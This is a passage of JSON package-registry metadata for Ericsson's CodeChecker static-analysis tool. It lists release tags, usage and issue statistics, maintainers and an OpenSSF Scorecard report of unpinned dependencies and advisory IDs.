son/codechecker@5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/5.2/manifests"},{"name":"v5.2","sha":"13cd6b405ed50ed5865c486eda44bf7e7d52b929","kind":"commit","published_at":"2016-02-17T12:35:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.2/manifests"},{"name":"v5.1","sha":"ab6c82930bde31e558ca20790df7a701e04ed7e6","kind":"commit","published_at":"2015-11-26T13:16:56.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.1/manifests"},{"name":"v5.0","sha":"5bb577a9c03bbe78317a4a57d20c0c1e3a3064d0","kind":"commit","published_at":"2015-11-11T10:02:45.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.0/manifests"},{"name":"v4.0","sha":"72075b4a94b791cee9f434ea5d06c702e2fce16d","kind":"commit","published_at":"2015-08-26T13:33:23.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v4.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v4.0/manifests"}]},"repo_metadata_updated_at":"2025-08-19T18:14:34.538Z","dependent_packages_count":0,"downloads":638,"downloads_period":"last-month","dependent_repos_count":1,"rankings":{"downloads":14.854914059561697,"dependent_repos_count":21.619800316896704,"dependent_packages_count":10.082087700208083,"stargazers_count":1.5815535685651674,"forks_count":2.888793017875278,"docker_downloads_count":null,"average":10.205429732621386},"purl":"pkg:pypi/codechecker-api-shared","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/pypi/codechecker-api-shared","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/pypi/codechecker-api-shared","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/pypi/codechecker-api-shared/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2025-08-10T06:58:09.855Z","issues_count":289,"pull_requests_count":576,"avg_time_to_close_issue":24131448.2,"avg_time_to_close_pull_request":3397393.635220126,"issues_closed_count":110,"pull_requests_closed_count":477,"pull_request_authors_count":72,"issue_authors_count":116,"avg_comments_per_issue":1.6678200692041523,"avg_comments_per_pull_request":0.7586805555555556,"merged_pull_requests_count":412,"bot_issues_count":0,"bot_pull_requests_count":59,"past_year_issues_count":89,"past_year_pull_requests_count":224,"past_year_avg_time_to_close_issue":3579611.04,"past_year_avg_time_to_close_pull_request":1482183.1176470588,"past_year_issues_closed_count":25,"past_year_pull_requests_closed_count":170,"past_year_pull_request_authors_count":37,"past_year_issue_authors_count":52,"past_year_avg_comments_per_issue":1.0337078651685394,"past_year_avg_comments_per_pull_request":0.5491071428571429,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":22,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/issues","maintainers":[{"login":"dkrupp","count":73,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dkrupp"},{"login":"vodorok","count":56,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vodorok"},{"login":"Szelethus","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Szelethus"},{"login":"whisperity","count":49,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/whisperity"},{"login":"cservakt","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cservakt"},{"login":"gamesh411","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gamesh411"},{"login":"gulyasgergely902","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gulyasgergely902"},{"login":"noraz31","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/noraz31"},{"login":"feyruzb","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/feyruzb"},{"login":"stt08","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/stt08"},{"login":"barnabasdomozi","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/barnabasdomozi"},{"login":"xb058t","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xb058t"},{"login":"csordasmarton","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/csordasmarton"}],"active_maintainers":[{"login":"dkrupp","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dkrupp"},{"login":"gulyasgergely902","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gulyasgergely902"},{"login":"gamesh411","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gamesh411"},{"login":"noraz31","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/noraz31"},{"login":"cservakt","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cservakt"},{"login":"feyruzb","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/feyruzb"},{"login":"barnabasdomozi","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/barnabasdomozi"},{"login":"xb058t","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xb058t"},{"login":"stt08","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/stt08"},{"login":"Szelethus","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Szelethus"},{"login":"whisperity","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/whisperity"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/codechecker-api-shared/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/codechecker-api-shared/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/codechecker-api-shared/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/codechecker-api-shared/related_packages","maintainers":[{"uuid":"bruntib","login":"bruntib","name":null,"email":null,"url":null,"packages_count":3,"html_url":"https://pypi.org/user/bruntib/","role":null,"created_at":"2023-02-10T15:53:53.837Z","updated_at":"2023-02-10T15:53:53.837Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/bruntib/packages"},{"uuid":"csordasmarton","login":"csordasmarton","name":null,"email":null,"url":null,"packages_count":3,"html_url":"https://pypi.org/user/csordasmarton/","role":null,"created_at":"2023-02-10T15:53:54.150Z","updated_at":"2023-02-10T15:53:54.150Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/csordasmarton/packages"},{"uuid":"gyorb","login":"gyorb","name":null,"email":null,"url":null,"packages_count":2,"html_url":"https://pypi.org/user/gyorb/","role":null,"created_at":"2023-02-10T15:53:54.478Z","updated_at":"2023-02-10T15:53:54.478Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/gyorb/packages"}],"registry":{"name":"pypi.org","url":"https://pypi.org","ecosystem":"pypi","default":true,"packages_count":726135,"maintainers_count":308800,"namespaces_count":0,"keywords_count":238245,"github":"pypi","metadata":{"funded_packages_count":50579},"icon_url":"https://github.com/pypi.png","created_at":"2022-04-04T15:19:23.364Z","updated_at":"2025-09-08T05:32:36.857Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/namespaces"}},{"id":4123290,"name":"github.com/Ericsson/codechecker","ecosystem":"go","description":"","homepage":"https://github.com/Ericsson/codechecker","licenses":"Apache-2.0","normalized_licenses":["Apache-2.0"],"repository_url":"https://github.com/Ericsson/codechecker","keywords_array":[],"namespace":"github.com/Ericsson","versions_count":71,"first_release_published_at":"2017-02-09T17:03:56.000Z","latest_release_published_at":"2025-07-10T17:42:22.000Z","latest_release_number":"v6.26.1+incompatible","last_synced_at":"2025-08-19T18:10:28.626Z","created_at":"2022-04-12T15:06:43.923Z","updated_at":"2025-08-19T18:14:34.538Z","registry_url":"https://pkg.go.dev/github.com/Ericsson/codechecker","install_command":"go get github.com/Ericsson/codechecker","documentation_url":"https://pkg.go.dev/github.com/Ericsson/codechecker#section-documentation","metadata":{},"repo_metadata":{"id":37431651,"uuid":"37459110","full_name":"Ericsson/codechecker","owner":"Ericsson","description":"CodeChecker is an analyzer tooling, defect database and viewer extension for static and dynamic analyzer tools.","archived":false,"fork":false,"pushed_at":"2025-08-19T16:09:45.000Z","size":44800,"stargazers_count":2443,"open_issues_count":456,"forks_count":424,"subscribers_count":52,"default_branch":"master","last_synced_at":"2025-08-19T17:45:59.071Z","etag":null,"topics":["analysis","c","clang","clang-tidy","codechecker","cpp","database","defects","docker","linux","llvm","macosx","objective-c","results-viewer","static-analysis","static-analyzer","static-analyzers","vue"],"latest_commit_sha":null,"homepage":"https://codechecker.readthedocs.io","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Ericsson.png","metadata":{"files":{"readme":"docs/README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE.TXT","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":"docs/supported_code_analyzers.md","governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2015-06-15T10:38:51.000Z","updated_at":"2025-08-19T16:09:49.000Z","dependencies_parsed_at":"2023-09-29T11:42:30.441Z","dependency_job_id":"50b5428a-2bdc-4def-b0a6-a46baec9079d","html_url":"https://github.com/Ericsson/codechecker","commit_stats":{"total_commits":3749,"total_committers":127,"mean_commits":"29.519685039370078","dds":0.6054947986129635,"last_synced_commit":"4234fb7b91d07681ee032862fbb096197d5f104a"},"previous_names":[],"tags_count":90,"template":false,"template_full_name":null,"purl":"pkg:github/Ericsson/codechecker","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Ericsson","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/sbom","scorecard":{"id":46490,"data":{"date":"2025-08-11","repo":{"name":"github.com/Ericsson/codechecker","commit":"49a939ab451d1b2a06553f17c4635a306527c33a"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.9,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 4 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/codechecker_master_analysis.yml:1","Warn: no topLevel permission defined: .github/workflows/codechecker_pr_analysis.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/config_coverage.yml:24","Info: topLevel permissions set to 'read-all': .github/workflows/docker.yml:8","Info: topLevel permissions set to 'read-all': .github/workflows/pypi.yml:9","Info: topLevel permissions set to 'read-all': .github/workflows/snap.yml:8","Info: topLevel permissions set to 'read-all': .github/workflows/test.yml:6","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.TXT:0","Info: FSF or OSI recognized license: Apache License 2.0: LICENSE.TXT:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/docker.yml:11"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codechecker_master_analysis.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/codechecker_master_analysis.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codechecker_master_analysis.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/codechecker_master_analysis.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codechecker_pr_analysis.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/codechecker_pr_analysis.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codechecker_pr_analysis.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/codechecker_pr_analysis.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/config_coverage.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/config_coverage.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/config_coverage.yml:32: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/config_coverage.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/config_coverage.yml:51: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/config_coverage.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/docker.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/docker.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/docker.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/docker.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/docker.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/docker.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/docker.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/docker.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:64: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:68: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/snap.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/snap.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/snap.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/snap.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/snap.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/snap.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:91: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:92: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:117: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:154: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:199: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: containerImage not pinned by hash: docker/Dockerfile.test.sqlite.clang11.bionic:1: pin your Docker image by updating ubuntu:18.04 to ubuntu:18.04@sha256:152dc042452c496007f07ca9127571cb9c29697f42acbfad72324b2bb2e43c98","Warn: containerImage not pinned by hash: docker/Dockerfile.test.sqlite.clang11.xenial:1: pin your Docker image by updating ubuntu:16.04 to ubuntu:16.04@sha256:1f1a2d56de1d604801a9671f301190704c25d604a416f59e03c04f5c6ffee0d6","Warn: containerImage not pinned by hash: docker/thrift/Dockerfile.thrift.noble:1: pin your Docker image by updating ubuntu:24.04 to ubuntu:24.04@sha256:a08e551cb33850e4740772b38217fc1796a66da2506d312abe51acda354ff061","Warn: containerImage not pinned by hash: web/docker/Dockerfile:5","Warn: containerImage not pinned by hash: web/docker/Dockerfile:43: pin your Docker image by updating python:3.10.16-slim-bullseye to python:3.10.16-slim-bullseye@sha256:c758f6d42a79466e943350a2c5273a09767bddc16a81d381ed21675a382205ee","Warn: pipCommand not pinned by hash: docker/Dockerfile.test.sqlite.clang11.bionic:3-29","Warn: pipCommand not pinned by hash: docker/Dockerfile.test.sqlite.clang11.bionic:3-29","Warn: pipCommand not pinned by hash: docker/Dockerfile.test.sqlite.clang11.xenial:3-33","Warn: pipCommand not pinned by hash: docker/Dockerfile.test.sqlite.clang11.xenial:3-33","Warn: downloadThenRun not pinned by hash: web/docker/Dockerfile:16-23","Warn: pipCommand not pinned by hash: web/docker/Dockerfile:91-119","Warn: pipCommand not pinned by hash: web/docker/Dockerfile:91-119","Warn: pipCommand not pinned by hash: web/docker/Dockerfile:91-119","Warn: pipCommand not pinned by hash: web/docker/Dockerfile:91-119","Warn: pipCommand not pinned by hash: .github/workflows/codechecker_master_analysis.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/codechecker_master_analysis.yml:24","Warn: pipCommand not pinned by hash: .github/workflows/codechecker_pr_analysis.yml:22","Warn: pipCommand not pinned by hash: .github/workflows/codechecker_pr_analysis.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/pypi.yml:103","Warn: pipCommand not pinned by hash: .github/workflows/pypi.yml:104","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:51","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:58","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:64","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:70","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:77","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:83","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:125","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:177","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:217","Info:   0 out of  28 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   6 third-party GitHubAction dependencies pinned","Info:   0 out of   5 containerImage dependencies pinned","Info:   0 out of  24 pipCommand dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"24 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: PYSEC-2025-49 / GHSA-5rjg-fvgr-3xxf","Warn: Project is vulnerable to: GHSA-9hjg-9r4m-mvj7","Warn: Project is vulnerable to: GHSA-3ww4-gg4f-jr7f","Warn: Project is vulnerable to: PYSEC-2024-225 / GHSA-6vqw-3v5j-54x4","Warn: Project is vulnerable to: GHSA-9v9h-cgj8-h64p","Warn: Project is vulnerable to: GHSA-h4gh-qq45-vh27","Warn: Project is vulnerable to: PYSEC-2023-254 / GHSA-jfhm-5ghh-2f97","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-gxpj-cx7g-858c","Warn: Project is vulnerable to: GHSA-2j2x-2gpw-g8fm","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-2p57-rm9w-gvfp","Warn: Project is vulnerable to: GHSA-f8q6-p94x-37v3","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-7fh5-64p2-3v2j","Warn: Project is vulnerable to: GHSA-p8p7-x288-28g6","Warn: Project is vulnerable to: GHSA-f5x3-32g6-xq36","Warn: Project is vulnerable to: GHSA-72xf-g2v4-qvf3","Warn: Project is vulnerable to: GHSA-cchq-frgv-rjh5","Warn: Project is vulnerable to: GHSA-g644-9gfx-q4q4","Warn: Project is vulnerable to: GHSA-5j4c-8p2g-v4jx","Warn: Project is vulnerable to: GHSA-g3ch-rx76-35fx","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-14T22:53:38.249Z","repository_id":37431651,"created_at":"2025-08-14T22:53:38.249Z","updated_at":"2025-08-14T22:53:38.249Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":271198843,"owners_count":24717130,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-08-19T02:00:09.176Z","response_time":63,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","ow